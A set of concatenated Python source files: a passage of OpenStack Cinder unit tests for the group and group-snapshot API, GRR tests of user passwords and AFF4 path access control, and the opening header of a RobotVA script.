[t['id'] for t in volume_types])
self.assertEqual(group["group_type_id"], fake.GROUP_TYPE_ID)
mock_group_type_get.assert_called_once_with(self.ctxt,
"fake-grouptype-name")
mock_volume_types_get.assert_called_once_with(mock.ANY,
volume_type_names)
@mock.patch('oslo_utils.timeutils.utcnow')
@mock.patch('cinder.objects.Group')
def test_reset_status(self, mock_group, mock_time_util):
mock_time_util.return_value = "time_now"
self.group_api.reset_status(self.ctxt, mock_group,
fields.GroupStatus.AVAILABLE)
update_field = {'updated_at': "time_now",
'status': fields.GroupStatus.AVAILABLE}
mock_group.update.assert_called_once_with(update_field)
mock_group.save.assert_called_once_with()
@mock.patch.object(GROUP_QUOTAS, "reserve")
@mock.patch('cinder.objects.Group')
@mock.patch('cinder.db.group_type_get_by_name')
@mock.patch('cinder.db.volume_types_get_by_name_or_id')
def test_create_group_failed_update_quota(self,
mock_volume_types_get,
mock_group_type_get, mock_group,
mock_group_quota_reserve):
mock_volume_types_get.return_value = [{'id': fake.VOLUME_TYPE_ID}]
mock_group_type_get.return_value = {'id': fake.GROUP_TYPE_ID}
fake_overs = ['groups']
fake_quotas = {'groups': 1}
fake_usages = {'groups': {'reserved': 0, 'in_use': 1}}
mock_group_quota_reserve.side_effect = exception.OverQuota(
overs=fake_overs,
quotas=fake_quotas,
usages=fake_usages)
name = "test_group"
description = "this is a test group"
grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],
availability_zone='nova', host=None,
name=name, description=description,
status=fields.GroupStatus.CREATING)
mock_group.return_value = grp
self.assertRaises(exception.GroupLimitExceeded,
self.group_api.create,
self.ctxt, name, description,
"fake-grouptype-name",
[fake.VOLUME_TYPE_ID],
availability_zone='nova')
@mock.patch('cinder.objects.Group')
@mock.patch('cinder.db.volume_get')
def test__validate_add_volumes(self, mock_volume_get, mock_group):
grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],
availability_zone='nova', host=None,
name="name", description="description",
status=fields.GroupStatus.CREATING)
mock_group.return_value = grp
fake_volume_obj = fake_volume.fake_volume_obj(self.ctxt)
mock_volume_get.return_value = fake_volume_obj
self.assertRaises(exception.InvalidVolume,
self.group_api._validate_add_volumes, self.ctxt,
[], ['123456789'], grp)
@ddt.data(['test_host@fakedrv#fakepool', 'test_host@fakedrv#fakepool'],
['test_host@fakedrv#fakepool', 'test_host2@fakedrv#fakepool'])
@mock.patch('cinder.volume.rpcapi.VolumeAPI.update_group')
@mock.patch('cinder.db.volume_get_all_by_generic_group')
@mock.patch('cinder.group.api.API._cast_create_group')
@mock.patch('cinder.group.api.API.update_quota')
@mock.patch('cinder.objects.Group')
@mock.patch('cinder.db.group_type_get')
@mock.patch('cinder.db.volume_types_get_by_name_or_id')
def test_update(self, hosts, mock_volume_types_get,
mock_group_type_get, mock_group,
mock_update_quota, mock_cast_create_group,
mock_volume_get_all, mock_rpc_update_group):
vol_type_dict = {'id': fake.VOLUME_TYPE_ID,
'name': 'fake_volume_type'}
vol_type = objects.VolumeType(self.ctxt, **vol_type_dict)
mock_volume_types_get.return_value = [{'id': fake.VOLUME_TYPE_ID}]
mock_group_type_get.return_value = {'id': fake.GROUP_TYPE_ID}
name = "test_group"
description = "this is a test group"
grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],
availability_zone='nova', host=None,
name=name, description=description,
status=fields.GroupStatus.CREATING)
mock_group.return_value = grp
ret_group = self.group_api.create(self.ctxt, name, description,
fake.GROUP_TYPE_ID,
[fake.VOLUME_TYPE_ID],
availability_zone='nova')
self.assertEqual(grp.obj_to_primitive(), ret_group.obj_to_primitive())
ret_group.volume_types = [vol_type]
ret_group.host = hosts[0]
# set resource_backend directly because ret_group
# is instance of MagicMock
ret_group.resource_backend = 'fake-cluster'
ret_group.status = fields.GroupStatus.AVAILABLE
ret_group.id = fake.GROUP_ID
vol1 = utils.create_volume(
self.ctxt, host=hosts[1],
availability_zone=ret_group.availability_zone,
volume_type_id=fake.VOLUME_TYPE_ID,
cluster_name='fake-cluster')
vol2 = utils.create_volume(
self.ctxt, host=hosts[1],
availability_zone=ret_group.availability_zone,
volume_type_id=fake.VOLUME_TYPE_ID,
group_id=fake.GROUP_ID,
cluster_name='fake-cluster')
vol2_dict = {
'id': vol2.id,
'group_id': fake.GROUP_ID,
'volume_type_id': fake.VOLUME_TYPE_ID,
'availability_zone': ret_group.availability_zone,
'host': hosts[1],
'status': 'available',
}
mock_volume_get_all.return_value = [vol2_dict]
new_name = "new_group_name"
new_desc = "this is a new group"
self.group_api.update(self.ctxt, ret_group, new_name, new_desc,
vol1.id, vol2.id)
mock_volume_get_all.assert_called_once_with(mock.ANY, ret_group.id)
mock_rpc_update_group.assert_called_once_with(self.ctxt, ret_group,
add_volumes=vol1.id,
remove_volumes=vol2.id)
@mock.patch('cinder.objects.GroupSnapshot.get_by_id')
@mock.patch('cinder.context.RequestContext.authorize')
def test_get_group_snapshot(self, mock_authorize, mock_group_snap):
fake_group_snap = 'fake_group_snap'
mock_group_snap.return_value = fake_group_snap
grp_snap = self.group_api.get_group_snapshot(
self.ctxt, fake.GROUP_SNAPSHOT_ID)
self.assertEqual(fake_group_snap, grp_snap)
mock_authorize.assert_called_once_with(
g_snap_policies.GET_POLICY,
target_obj=fake_group_snap)
@ddt.data(True, False)
@mock.patch('cinder.objects.GroupSnapshotList.get_all')
@mock.patch('cinder.objects.GroupSnapshotList.get_all_by_project')
def test_get_all_group_snapshots(self, is_admin,
mock_get_all_by_project,
mock_get_all):
fake_group_snaps = ['fake_group_snap1', 'fake_group_snap2']
fake_group_snaps_by_project = ['fake_group_snap1']
mock_get_all.return_value = fake_group_snaps
mock_get_all_by_project.return_value = fake_group_snaps_by_project
if is_admin:
grp_snaps = self.group_api.get_all_group_snapshots(
self.ctxt, filters={'all_tenants': True})
self.assertEqual(fake_group_snaps, grp_snaps)
else:
grp_snaps = self.group_api.get_all_group_snapshots(
self.user_ctxt)
self.assertEqual(fake_group_snaps_by_project, grp_snaps)
@mock.patch('cinder.objects.GroupSnapshot')
def test_update_group_snapshot(self, mock_group_snap):
grp_snap_update = {"name": "new_name",
"description": "This is a new description"}
self.group_api.update_group_snapshot(self.ctxt, mock_group_snap,
grp_snap_update)
mock_group_snap.update.assert_called_once_with(grp_snap_update)
mock_group_snap.save.assert_called_once_with()
@mock.patch('cinder.volume.rpcapi.VolumeAPI.delete_group_snapshot')
@mock.patch('cinder.volume.rpcapi.VolumeAPI.create_group_snapshot')
@mock.patch('cinder.volume.api.API.create_snapshots_in_db')
@mock.patch('cinder.objects.Group')
@mock.patch('cinder.objects.GroupSnapshot')
@mock.patch('cinder.objects.SnapshotList.get_all_for_group_snapshot')
def test_create_delete_group_snapshot(self,
mock_snap_get_all,
mock_group_snap, mock_group,
mock_create_in_db,
mock_create_api, mock_delete_api):
name = "fake_name"
description = "fake description"
mock_group.id = fake.GROUP_ID
mock_group.group_type_id = fake.GROUP_TYPE_ID
mock_group.assert_not_frozen = mock.Mock(return_value=True)
mock_group.volumes = []
ret_group_snap = self.group_api.create_group_snapshot(
self.ctxt, mock_group, name, description)
mock_snap_get_all.return_value = []
options = {'group_id': fake.GROUP_ID,
'user_id': self.ctxt.user_id,
'project_id': self.ctxt.project_id,
'status': "creating",
'name': name,
'description': description,
'group_type_id': fake.GROUP_TYPE_ID}
mock_group_snap.assert_called_once_with(self.ctxt, **options)
ret_group_snap.create.assert_called_once_with()
mock_create_in_db.assert_called_once_with(self.ctxt, [],
ret_group_snap.name,
ret_group_snap.description,
None,
ret_group_snap.id)
mock_create_api.assert_called_once_with(self.ctxt, ret_group_snap)
ret_group_snap.assert_not_frozen = mock.Mock(return_value=True)
self.group_api.delete_group_snapshot(self.ctxt, ret_group_snap)
mock_delete_api.assert_called_once_with(mock.ANY, ret_group_snap)
@mock.patch('cinder.volume.api.API.delete')
@mock.patch('cinder.objects.VolumeType.get_by_name_or_id')
@mock.patch('cinder.db.group_volume_type_mapping_create')
@mock.patch('cinder.volume.api.API.create')
@mock.patch('cinder.objects.GroupSnapshot.get_by_id')
@mock.patch('cinder.objects.SnapshotList.get_all_for_group_snapshot')
@mock.patch('cinder.volume.rpcapi.VolumeAPI.create_group_from_src')
@mock.patch('cinder.objects.VolumeList.get_all_by_generic_group')
def test_create_group_from_snap_volume_failed(
self, mock_volume_get_all,
mock_rpc_create_group_from_src,
mock_snap_get_all, mock_group_snap_get,
mock_volume_api_create,
mock_mapping_create,
mock_get_volume_type, mock_volume_delete):
mock_volume_api_create.side_effect = [exception.CinderException]
vol_type = fake_volume.fake_volume_type_obj(
self.ctxt,
id=fake.VOLUME_TYPE_ID,
name='fake_volume_type')
mock_get_volume_type.return_value = vol_type
grp_snap = utils.create_group_snapshot(
self.ctxt, fake.GROUP_ID,
group_type_id=fake.GROUP_TYPE_ID,
status=fields.GroupStatus.CREATING)
mock_group_snap_get.return_value = grp_snap
vol1 = utils.create_volume(
self.ctxt,
availability_zone='nova',
volume_type_id=vol_type['id'],
group_id=fake.GROUP_ID)
snap = utils.create_snapshot(self.ctxt, vol1.id,
volume_type_id=vol_type['id'],
status=fields.GroupStatus.CREATING)
mock_snap_get_all.return_value = [snap]
name = "test_group"
description = "this is a test group"
grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type['id']],
availability_zone='nova',
name=name, description=description,
group_snapshot_id=grp_snap.id,
status=fields.GroupStatus.CREATING)
vol2 = utils.create_volume(
self.ctxt,
availability_zone=grp.availability_zone,
volume_type_id=vol_type['id'],
group_id=grp.id,
snapshot_id=snap.id)
mock_volume_get_all.return_value = [vol2]
self.assertRaises(
exception.CinderException,
self.group_api._create_group_from_group_snapshot,
self.ctxt, grp, grp_snap.id)
mock_volume_api_create.assert_called_once_with(
self.ctxt, 1, None, None,
availability_zone=grp.availability_zone,
group_snapshot=grp_snap,
group=grp,
snapshot=snap,
volume_type=vol_type)
mock_rpc_create_group_from_src.assert_not_called()
mock_volume_delete.assert_called_once_with(self.ctxt, vol2)
vol2.destroy()
grp.destroy()
snap.destroy()
vol1.destroy()
grp_snap.destroy()
@mock.patch('cinder.group.api.API._update_volumes_host')
@mock.patch('cinder.objects.VolumeType.get_by_name_or_id')
@mock.patch('cinder.db.group_volume_type_mapping_create')
@mock.patch('cinder.volume.api.API.create')
@mock.patch('cinder.objects.GroupSnapshot.get_by_id')
@mock.patch('cinder.objects.SnapshotList.get_all_for_group_snapshot')
@mock.patch('cinder.volume.rpcapi.VolumeAPI.create_group_from_src')
@mock.patch('cinder.objects.VolumeList.get_all_by_generic_group')
def test_create_group_from_snap(self, mock_volume_get_all,
mock_rpc_create_group_from_src,
mock_snap_get_all, mock_group_snap_get,
mock_volume_api_create,
mock_mapping_create,
mock_get_volume_type,
mock_update_volumes_host):
vol_type = fake_volume.fake_volume_type_obj(
self.ctxt,
id=fake.VOLUME_TYPE_ID,
name='fake_volume_type')
mock_get_volume_type.return_value = vol_type
grp_snap = utils.create_group_snapshot(
self.ctxt, fake.GROUP_ID,
group_type_id=fake.GROUP_TYPE_ID,
status=fields.GroupStatus.CREATING)
mock_group_snap_get.return_value = grp_snap
vol1 = utils.create_volume(
self.ctxt,
availability_zone='nova',
volume_type_id=vol_type['id'],
group_id=fake.GROUP_ID)
snap = utils.create_snapshot(self.ctxt, vol1.id,
volume_type_id=vol_type['id'],
status=fields.GroupStatus.CREATING)
mock_snap_get_all.return_value = [snap]
name = "test_group"
description = "this is a test group"
grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type['id']],
availability_zone='nova',
name=name, description=description,
group_snapshot_id=grp_snap.id,
status=fields.GroupStatus.CREATING)
vol2 = utils.create_volume(
self.ctxt,
availability_zone=grp.availability_zone,
volume_type_id=vol_type['id'],
group_id=grp.id,
snapshot_id=snap.id)
mock_volume_get_all.return_value = [vol2]
self.group_api._create_group_from_group_snapshot(self.ctxt, grp,
grp_snap.id)
mock_volume_api_create.assert_called_once_with(
self.ctxt, 1, None, None,
availability_zone=grp.availability_zone,
group_snapshot=grp_snap,
group=grp,
snapshot=snap,
volume_type=vol_type)
mock_rpc_create_group_from_src.assert_called_once_with(
self.ctxt, grp, grp_snap)
mock_update_volumes_host.assert_called_once_with(
self.ctxt, grp
)
vol2.destroy()
grp.destroy()
snap.destroy()
vol1.destroy()
grp_snap.destroy()
@mock.patch('cinder.group.api.API._update_volumes_host')
@mock.patch('cinder.objects.VolumeType.get_by_name_or_id')
@mock.patch('cinder.db.group_volume_type_mapping_create')
@mock.patch('cinder.volume.api.API.create')
@mock.patch('cinder.objects.Group.get_by_id')
@mock.patch('cinder.volume.rpcapi.VolumeAPI.create_group_from_src')
@mock.patch('cinder.objects.VolumeList.get_all_by_generic_group')
def test_create_group_from_group(self, mock_volume_get_all,
mock_rpc_create_group_from_src,
mock_group_get,
mock_volume_api_create,
mock_mapping_create,
mock_get_volume_type,
mock_update_volumes_host):
vol_type = fake_volume.fake_volume_type_obj(
self.ctxt,
id=fake.VOLUME_TYPE_ID,
name='fake_volume_type')
mock_get_volume_type.return_value = vol_type
grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type['id']],
availability_zone='nova',
status=fields.GroupStatus.CREATING)
mock_group_get.return_value = grp
vol = utils.create_volume(
self.ctxt,
availability_zone=grp.availability_zone,
volume_type_id=fake.VOLUME_TYPE_ID,
group_id=grp.id)
mock_volume_get_all.return_value = [vol]
grp2 = utils.create_group(self.ctxt,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type['id']],
availability_zone='nova',
source_group_id=grp.id,
status=fields.GroupStatus.CREATING)
vol2 = utils.create_volume(
self.ctxt,
availability_zone=grp.availability_zone,
volume_type_id=vol_type['id'],
group_id=grp2.id,
source_volid=vol.id)
self.group_api._create_group_from_source_group(self.ctxt, grp2,
grp.id)
mock_volume_api_create.assert_called_once_with(
self.ctxt, 1, None, None,
availability_zone=grp.availability_zone,
source_group=grp,
group=grp2,
source_volume=vol,
volume_type=vol_type)
mock_rpc_create_group_from_src.assert_called_once_with(
self.ctxt, grp2, None, grp)
mock_update_volumes_host.assert_called_once_with(
self.ctxt, grp2
)
vol2.destroy()
grp2.destroy()
vol.destroy()
grp.destroy()
@mock.patch('cinder.volume.api.API.delete')
@mock.patch('cinder.objects.VolumeType.get_by_name_or_id')
@mock.patch('cinder.db.group_volume_type_mapping_create')
@mock.patch('cinder.volume.api.API.create')
@mock.patch('cinder.objects.Group.get_by_id')
@mock.patch('cinder.volume.rpcapi.VolumeAPI.create_group_from_src')
@mock.patch('cinder.objects.VolumeList.get_all_by_generic_group')
def test_create_group_from_group_create_volume_failed(
self, mock_volume_get_all, mock_rpc_create_group_from_src,
mock_group_get, mock_volume_api_create, mock_mapping_create,
mock_get_volume_type, mock_volume_delete):
vol_type = fake_volume.fake_volume_type_obj(
self.ctxt,
id=fake.VOLUME_TYPE_ID,
name='fake_volume_type')
mock_get_volume_type.return_value = vol_type
grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type['id']],
availability_zone='nova',
status=fields.GroupStatus.CREATING)
mock_group_get.return_value = grp
vol1 = utils.create_volume(
self.ctxt,
availability_zone=grp.availability_zone,
volume_type_id=fake.VOLUME_TYPE_ID,
group_id=grp.id)
vol2 = utils.create_volume(
self.ctxt,
availability_zone=grp.availability_zone,
volume_type_id=fake.VOLUME_TYPE_ID,
group_id=grp.id)
mock_volume_get_all.side_effect = [[vol1, vol2], [vol1]]
grp2 = utils.create_group(self.ctxt,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type['id']],
availability_zone='nova',
source_group_id=grp.id,
status=fields.GroupStatus.CREATING)
mock_volume_api_create.side_effect = [None, exception.CinderException]
self.assertRaises(
exception.CinderException,
self.group_api._create_group_from_source_group,
self.ctxt, grp2, grp.id)
mock_rpc_create_group_from_src.assert_not_called()
mock_volume_delete.assert_called_once_with(self.ctxt, vol1)
grp2.destroy()
vol2.destroy()
vol1.destroy()
grp.destroy()
@mock.patch('cinder.group.api.API._create_group_from_group_snapshot')
@mock.patch('cinder.group.api.API._create_group_from_source_group')
@mock.patch('cinder.group.api.API.update_quota')
@mock.patch('cinder.objects.GroupSnapshot.get_by_id')
@mock.patch('cinder.objects.SnapshotList.get_all_for_group_snapshot')
@mock.patch('cinder.scheduler.rpcapi.SchedulerAPI.validate_host_capacity')
def test_create_from_src(self, mock_validate_host, mock_snap_get_all,
mock_group_snap_get, mock_update_quota,
mock_create_from_group,
mock_create_from_snap):
name = "test_group"
description = "this is a test group"
grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],
availability_zone='nova',
name=name, description=description,
status=fields.GroupStatus.AVAILABLE,)
vol1 = utils.create_volume(
self.ctxt,
availability_zone='nova',
volume_type_id=fake.VOLUME_TYPE_ID,
group_id=grp.id)
snap = utils.create_snapshot(self.ctxt, vol1.id,
volume_type_id=fake.VOLUME_TYPE_ID,
status=fields.SnapshotStatus.AVAILABLE)
mock_snap_get_all.return_value = [snap]
mock_validate_host.return_host = True
grp_snap = utils.create_group_snapshot(
self.ctxt, grp.id,
group_type_id=fake.GROUP_TYPE_ID,
status=fields.GroupStatus.AVAILABLE)
mock_group_snap_get.return_value = grp_snap
grp2 = utils.create_group(self.ctxt,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],
availability_zone='nova',
name=name, description=description,
status=fields.GroupStatus.CREATING,
group_snapshot_id=grp_snap.id)
with mock.patch('cinder.objects.Group') as mock_group:
mock_group.return_value = grp2
with mock.patch('cinder.objects.group.Group.create'):
ret_group = self.group_api.create_from_src(
self.ctxt, name, description,
group_snapshot_id=grp_snap.id,
source_group_id=None)
self.assertEqual(grp2.obj_to_primitive(),
ret_group.obj_to_primitive())
mock_create_from_snap.assert_called_once_with(
self.ctxt, grp2, grp_snap.id)
snap.destroy()
grp_snap.destroy()
vol1.destroy()
grp.destroy()
grp2.destroy()
@mock.patch('oslo_utils.timeutils.utcnow')
@mock.patch('cinder.objects.GroupSnapshot')
def test_reset_group_snapshot_status(self,
mock_group_snapshot,
mock_time_util):
mock_time_util.return_value = "time_now"
self.group_api.reset_group_snapshot_status(
self.ctxt, mock_group_snapshot, fields.GroupSnapshotStatus.ERROR)
update_field = {'updated_at': "time_now",
'status': fields.GroupSnapshotStatus.ERROR}
mock_group_snapshot.update.assert_called_once_with(update_field)
mock_group_snapshot.save.assert_called_once_with()
@mock.patch('cinder.scheduler.rpcapi.SchedulerAPI.validate_host_capacity')
def test_create_group_from_src_frozen(self, mock_validate_host):
service = utils.create_service(self.ctxt, {'frozen': True})
group = utils.create_group(self.ctxt, host=service.host,
group_type_id='gt')
mock_validate_host.return_value = True
group_api = cinder.group.api.API()
self.assertRaises(exception.InvalidInput,
group_api.create_from_src,
self.ctxt, 'group', 'desc',
group_snapshot_id=None, source_group_id=group.id)
@mock.patch('cinder.objects.volume.Volume.host',
new_callable=mock.PropertyMock)
@mock.patch('cinder.objects.volume.Volume.cluster_name',
new_callable=mock.PropertyMock)
@mock.patch('cinder.objects.VolumeList.get_all_by_generic_group')
def test_update_volumes_host(self, mock_volume_get_all, mock_cluster_name,
mock_host):
vol_type = utils.create_volume_type(self.ctxt, name='test_vol_type')
grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type['id']],
availability_zone='nova',
status=fields.GroupStatus.CREATING,
cluster_name='fake_cluster')
vol1 = utils.create_volume(
self.ctxt,
availability_zone=grp.availability_zone,
volume_type_id=fake.VOLUME_TYPE_ID,
group_id=grp.id)
mock_volume = mock.Mock()
mock_volume_get_all.return_value = [mock_volume]
group_api = cinder.group.api.API()
group_api._update_volumes_host(None, grp)
mock_cluster_name.assert_called()
mock_host.assert_called()
self.assertEqual(grp.host, mock_volume.host)
self.assertEqual(grp.cluster_name, mock_volume.cluster_name)
mock_volume.save.assert_called_once_with()
vol1.destroy()
grp.destroy()
def test_delete_group_frozen(self):
service = utils.create_service(self.ctxt, {'frozen': True})
group = utils.create_group(self.ctxt, host=service.host,
group_type_id='gt')
group_api = cinder.group.api.API()
self.assertRaises(exception.InvalidInput,
group_api.delete, self.ctxt, group)
def test_create_group_snapshot_frozen(self):
service = utils.create_service(self.ctxt, {'frozen': True})
group = utils.create_group(self.ctxt, host=service.host,
group_type_id='gt')
group_api = cinder.group.api.API()
self.assertRaises(exception.InvalidInput,
group_api.create_group_snapshot,
self.ctxt, group, 'group_snapshot', 'desc')
def test_delete_group_snapshot_frozen(self):
service = utils.create_service(self.ctxt, {'frozen': True})
group = utils.create_group(self.ctxt, host=service.host,
group_type_id='gt')
gsnap = utils.create_group_snapshot(self.ctxt, group.id)
group_api = cinder.group.api.API()
self.assertRaises(exception.InvalidInput,
group_api.delete_group_snapshot,
self.ctxt, gsnap)
@mock.patch('cinder.volume.volume_types.get_volume_type_qos_specs',
return_value={'qos_specs': {}})
@mock.patch('cinder.scheduler.rpcapi.SchedulerAPI.create_group')
def test_cast_create_group(self,
mock_create_group,
mock_get_volume_type_qos_specs):
vol_type = utils.create_volume_type(self.ctxt, name='test_vol_type')
encryption_key_id = mock.sentinel.encryption_key_id
description = mock.sentinel.description
name = mock.sentinel.name
req_spec = {'volume_type': vol_type,
'encryption_key_id': encryption_key_id,
'description': description,
'name': name}
grp_name = "test_group"
grp_description = "this is a test group"
grp_spec = {'name': grp_name,
'description': grp_description}
grp = utils.create_group(self.ctxt,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[vol_type.id],
availability_zone='nova')
grp_filter_properties = mock.sentinel.group_filter_properties
filter_properties_list = mock.sentinel.filter_properties_list
self.group_api._cast_create_group(self.ctxt,
grp,
grp_spec,
[req_spec],
grp_filter_properties,
filter_properties_list)
mock_get_volume_type_qos_specs.assert_called_once_with(vol_type.id)
exp_vol_properties = {
'size': 0,
'user_id': self.ctxt.user_id,
'project_id': self.ctxt.project_id,
'status': 'creating',
'attach_status': 'detached',
'encryption_key_id': encryption_key_id,
'display_description': description,
'display_name': name,
'volume_type_id': vol_type.id,
'group_type_id': grp.group_type_id,
'availability_zone': grp.availability_zone
}
exp_req_spec = {
'volume_type': vol_type,
'encryption_key_id': encryption_key_id,
'description': description,
'name': name,
'volume_properties': exp_vol_properties,
'qos_specs': None
}
exp_grp_properties = {
'size': 0,
'user_id': self.ctxt.user_id,
'project_id': self.ctxt.project_id,
'status': 'creating',
'display_description': grp_description,
'display_name': grp_name,
'group_type_id': grp.group_type_id,
}
exp_grp_spec = {
'name': grp_name,
'description': grp_description,
'volume_properties': exp_grp_properties,
'qos_specs': None
}
mock_create_group.assert_called_once_with(
self.ctxt,
grp,
group_spec=exp_grp_spec,
request_spec_list=[exp_req_spec],
group_filter_properties=grp_filter_properties,
filter_properties_list=filter_properties_list)
| |
#!/usr/bin/env python
from grr.lib import access_control
from grr.lib import aff4
from grr.lib import rdfvalue
from grr.lib import test_lib
from grr.lib.aff4_objects import user_managers
class GRRUserTest(test_lib.AFF4ObjectTest):
def testUserPasswords(self):
with aff4.FACTORY.Create("aff4:/users/test", "GRRUser",
token=self.token) as user:
user.SetPassword("hello")
user = aff4.FACTORY.Open(user.urn, token=self.token)
self.assertFalse(user.CheckPassword("goodbye"))
self.assertTrue(user.CheckPassword("hello"))
def testLabels(self):
with aff4.FACTORY.Create("aff4:/users/test", "GRRUser",
token=self.token) as user:
user.SetLabels("hello", "world", owner="GRR")
user = aff4.FACTORY.Open(user.urn, token=self.token)
self.assertListEqual(["hello", "world"], user.GetLabelsNames())
class CheckAccessHelperTest(test_lib.AFF4ObjectTest):
def setUp(self):
super(CheckAccessHelperTest, self).setUp()
self.helper = user_managers.CheckAccessHelper("test")
self.subject = rdfvalue.RDFURN("aff4:/some/path")
def testReturnsFalseByDefault(self):
self.assertRaises(access_control.UnauthorizedAccess,
self.helper.CheckAccess, self.subject, self.token)
def testReturnsFalseOnFailedMatch(self):
self.helper.Allow("aff4:/some/otherpath")
self.assertRaises(access_control.UnauthorizedAccess,
self.helper.CheckAccess, self.subject, self.token)
def testReturnsTrueOnMatch(self):
self.helper.Allow("aff4:/some/path")
self.assertTrue(self.helper.CheckAccess(self.subject, self.token))
def testReturnsTrueIfOneMatchFails1(self):
self.helper.Allow("aff4:/some/otherpath")
self.helper.Allow("aff4:/some/path")
self.assertTrue(self.helper.CheckAccess(self.subject, self.token))
def testReturnsTrueIfOneMatchFails2(self):
self.helper.Allow("aff4:/some/path")
self.helper.Allow("aff4:/some/otherpath")
self.assertTrue(self.helper.CheckAccess(self.subject, self.token))
def testFnmatchFormatIsUsedByDefault1(self):
self.helper.Allow("aff4:/some/*")
self.assertTrue(self.helper.CheckAccess(self.subject, self.token))
def testFnmatchFormatIsUsedByDefault2(self):
self.helper.Allow("aff4:/some*")
self.assertTrue(self.helper.CheckAccess(self.subject, self.token))
def testFnmatchPatternCorrectlyMatchesFilesBelowDirectory(self):
self.helper.Allow("aff4:/some/*")
self.assertTrue(self.helper.CheckAccess(self.subject, self.token))
self.assertRaises(access_control.UnauthorizedAccess,
self.helper.CheckAccess,
rdfvalue.RDFURN("aff4:/some"), self.token)
def testCustomCheckWorksCorrectly(self):
def CustomCheck(unused_subject, unused_token):
return True
self.helper.Allow("aff4:/some/path", CustomCheck)
self.assertTrue(self.helper.CheckAccess(self.subject, self.token))
def testCustomCheckFailsCorrectly(self):
def CustomCheck(unused_subject, unused_token):
raise access_control.UnauthorizedAccess("Problem")
self.helper.Allow("aff4:/some/path", CustomCheck)
self.assertRaises(access_control.UnauthorizedAccess,
self.helper.CheckAccess, self.subject, self.token)
def testCustomCheckAcceptsAdditionalArguments(self):
def CustomCheck(subject, unused_token, another_subject):
if subject == another_subject:
return True
else:
raise access_control.UnauthorizedAccess("Problem")
self.helper.Allow("aff4:/*", CustomCheck, self.subject)
self.assertRaises(access_control.UnauthorizedAccess,
self.helper.CheckAccess,
rdfvalue.RDFURN("aff4:/some/other/path"),
self.token)
self.assertTrue(self.helper.CheckAccess(self.subject, self.token))
def Ok(self, subject, access="r"):
self.assertTrue(
self.access_manager.CheckDataStoreAccess(self.token, [subject], access))
def NotOk(self, subject, access="r"):
self.assertRaises(
access_control.UnauthorizedAccess,
self.access_manager.CheckDataStoreAccess,
self.token, [subject], access)
def testReadSomePaths(self):
"""Tests some real world paths."""
self.access_manager = user_managers.FullAccessControlManager()
access = "r"
self.Ok("aff4:/", access)
self.Ok("aff4:/users", access)
self.NotOk("aff4:/users/randomuser", access)
self.Ok("aff4:/blobs", access)
self.Ok("aff4:/blobs/12345678", access)
self.Ok("aff4:/FP", access)
self.Ok("aff4:/FP/12345678", access)
self.Ok("aff4:/files", access)
self.Ok("aff4:/files/12345678", access)
self.Ok("aff4:/ACL", access)
self.Ok("aff4:/ACL/randomuser", access)
self.Ok("aff4:/stats", access)
self.Ok("aff4:/stats/FileStoreStats", access)
self.Ok("aff4:/config", access)
self.Ok("aff4:/config/drivers", access)
self.Ok("aff4:/config/drivers/windows/memory/winpmem.amd64.sys", access)
self.Ok("aff4:/flows", access)
self.Ok("aff4:/flows/F:12345678", access)
self.Ok("aff4:/hunts", access)
self.Ok("aff4:/hunts/H:12345678/C.1234567890123456", access)
self.Ok("aff4:/hunts/H:12345678/C.1234567890123456/F:AAAAAAAA", access)
self.Ok("aff4:/cron", access)
self.Ok("aff4:/cron/OSBreakDown", access)
self.Ok("aff4:/crashes", access)
self.Ok("aff4:/crashes/Stream", access)
self.Ok("aff4:/audit", access)
self.Ok("aff4:/audit/log", access)
self.Ok("aff4:/audit/logs", access)
self.Ok("aff4:/C.0000000000000001", access)
self.NotOk("aff4:/C.0000000000000001/fs/os", access)
self.NotOk("aff4:/C.0000000000000001/flows/F:12345678", access)
self.Ok("aff4:/tmp", access)
self.Ok("aff4:/tmp/C8FAFC0F", access)
def testQuerySomePaths(self):
"""Tests some real world paths."""
self.access_manager = user_managers.FullAccessControlManager()
access = "rq"
self.NotOk("aff4:/", access)
self.NotOk("aff4:/users", access)
self.NotOk("aff4:/users/randomuser", access)
self.NotOk("aff4:/blobs", access)
self.NotOk("aff4:/FP", access)
self.NotOk("aff4:/files", access)
self.Ok("aff4:/files/hash/generic/sha256/" + "a" * 64, access)
self.Ok("aff4:/ACL", access)
self.Ok("aff4:/ACL/randomuser", access)
self.NotOk("aff4:/stats", access)
self.Ok("aff4:/config", access)
self.Ok("aff4:/config/drivers", access)
self.Ok("aff4:/config/drivers/windows/memory/winpmem.amd64.sys", access)
self.NotOk("aff4:/flows", access)
self.Ok("aff4:/flows/W:12345678", access)
self.Ok("aff4:/hunts", access)
self.Ok("aff4:/hunts/H:12345678/C.1234567890123456", access)
self.Ok("aff4:/hunts/H:12345678/C.1234567890123456/F:AAAAAAAA", access)
self.Ok("aff4:/cron", access)
self.Ok("aff4:/cron/OSBreakDown", access)
self.NotOk("aff4:/crashes", access)
self.NotOk("aff4:/audit", access)
self.Ok("aff4:/audit/logs", access)
self.Ok("aff4:/C.0000000000000001", access)
self.NotOk("aff4:/C.0000000000000001/fs/os", access)
self.NotOk("aff4:/C.0000000000000001/flows", access)
self.NotOk("aff4:/tmp", access)
| |
#!/usr/bin/env python
"""
#@Author: Frankln Kenghagho
#@Date: 04.04.2019
#@Project: RobotVA
"""
#This program is frontend and multi-task, namely
# 1- Setting of model paths
